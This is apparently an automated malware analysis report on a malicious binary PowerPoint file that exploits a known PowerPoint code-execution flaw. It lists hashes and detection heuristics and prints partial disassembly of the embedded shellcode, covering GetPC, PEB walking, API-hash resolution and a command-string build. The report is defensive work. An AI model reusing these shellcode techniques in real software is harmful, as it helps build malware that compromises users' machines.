Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 46f9c4734befb9f6…

MALICIOUS

Office (OLE)

Size: 616.5 KB
Created: 1601-01-01 00:00:00
Authoring application: Microsoft PowerPoint
First seen: 2026-06-16
MD5: 4c5a3377c814921c7d98551b8df1c3f2
SHA-1: a4c226085cabc69ef443a9547b167080ba023155
SHA-256: 46f9c4734befb9f6cf27f5fb9f926754dfa9be69ade6765081055776e8f6f618
Risk score: 280

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The critical heuristic 'PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD' indicates exploitation of CVE-2011-1269 / MS11-036, a known vulnerability in PowerPoint that allows for remote code execution. The presence of heuristics related to PEB access, API hash resolution, VirtualAlloc, LoadLibrary, and GetProcAddress suggests the execution of shellcode that likely performs process injection or loads additional malicious components. No document body or script content was available for further analysis.

Heuristics (7)

  • PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family (severity: critical; CVE match: likely; id: PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD)
    A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
  • x86 GetPC stub (CALL $+5; POP EAX) (severity: high; id: SC_GETPC_CALL)
    Disassembly
    x86 disassembly · validity: code (0.929) — 3/3 branch targets land on an instruction boundary (100% coherence)
    00000F51  e800000000        call 0xf56
    00000F56  58                pop eax
    00000F57  83e8fb            sub eax, -5
    00000F5A  c3                ret
    00000F5B  f3a4              rep movsb byte ptr es:[edi], byte ptr [esi]
    00000F5D  33c0              xor eax, eax
    00000F5F  8bcb              mov ecx, ebx
    00000F61  f3aa              rep stosb byte ptr es:[edi], al
    00000F63  5f                pop edi
    00000F64  5e                pop esi
    00000F65  ff7704            push dword ptr [edi + 4]
    00000F68  ff560c            call dword ptr [esi + 0xc]
    00000F6B  8d9e4c020000      lea ebx, [esi + 0x24c]
    00000F71  53                push ebx
    00000F72  ff5624            call dword ptr [esi + 0x24]
    00000F75  c6040322          mov byte ptr [ebx + eax], 0x22
    00000F79  c644030100        mov byte ptr [ebx + eax + 1], 0
    00000F7E  83eb20            sub ebx, 0x20
    00000F81  c7431c65202022    mov dword ptr [ebx + 0x1c], 0x22202065
    00000F88  c74318742e6578    mov dword ptr [ebx + 0x18], 0x78652e74
    00000F8F  c743146572706e    mov dword ptr [ebx + 0x14], 0x6e707265
    00000F96  c7431020706f77    mov dword ptr [ebx + 0x10], 0x776f7020
    00000F9D  c7430c74617274    mov dword ptr [ebx + 0xc], 0x74726174
    00000FA4  c743082f632073    mov dword ptr [ebx + 8], 0x7320632f
    00000FAB  c7                .byte 0xc7
    00000FAC  43                inc ebx
    00000FAD  0465              add al, 0x65
    00000FAF  7865              js 0x1016
  • PEB access via FS segment (x86) (severity: high; id: SC_PEB_ACCESS)
    Disassembly
    x86 disassembly · validity: uncertain (0.504) — 8/10 branch targets land on an instruction boundary (80% coherence)
    00000FED  64a130000000      mov eax, dword ptr fs:[0x30]
    00000FF3  85c0              test eax, eax
    00000FF5  7813              js 0x100a
    00000FF7  3e8b400c          mov eax, dword ptr ds:[eax + 0xc]
    00000FFB  3e8b701c          mov esi, dword ptr ds:[eax + 0x1c]
    00000FFF  ad                lodsd eax, dword ptr [esi]
    00001000  3e8b5e08          mov ebx, dword ptr ds:[esi + 8]
    00001004  3e8b6808          mov ebp, dword ptr ds:[eax + 8]
    00001008  eb0d              jmp 0x1017
    0000100A  3e8b4034          mov eax, dword ptr ds:[eax + 0x34]
    0000100E  3e8ba8b8000000    mov ebp, dword ptr ds:[eax + 0xb8]
    00001015  33db              xor ebx, ebx
    00001017  8bc5              mov eax, ebp
    00001019  5e                pop esi
    0000101A  5d                pop ebp
    0000101B  c20400            ret 4
    0000101E  53                push ebx
    0000101F  55                push ebp
    00001020  56                push esi
    00001021  57                push edi
    00001022  368b6c2418        mov ebp, dword ptr ss:[esp + 0x18]
    00001027  368b453c          mov eax, dword ptr ss:[ebp + 0x3c]
    0000102B  368b540578        mov edx, dword ptr ss:[ebp + eax + 0x78]
    00001030  03d5              add edx, ebp
    00001032  3e8b4a18          mov ecx, dword ptr ds:[edx + 0x18]
    00001036  3e8b5a20          mov ebx, dword ptr ds:[edx + 0x20]
    0000103A  03dd              add ebx, ebp
    0000103C  e338              jecxz 0x1076
    0000103E  49                dec ecx
    0000103F  3e8b348b          mov esi, dword ptr ds:[ebx + ecx*4]
    00001043  03f5              add esi, ebp
    00001045  33ff              xor edi, edi
    00001047  fc                cld
    00001048  33c0              xor eax, eax
    0000104A  ac                lodsb al, byte ptr [esi]
    0000104B  3ac4              cmp al, ah
  • PEB API-hash resolver (severity: high; id: SC_API_HASH_RESOLVER)
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly: identical to the listing at 00000FED–0000104B shown under the PEB access heuristic above.
  • Reference to LoadLibrary API (severity: high; id: SC_STR_LOADLIBRARY)
  • Reference to GetProcAddress API (severity: high; id: SC_STR_GETPROCADDRESS)
  • Reference to VirtualAlloc API (severity: medium; id: SC_STR_VIRTUALALLOC)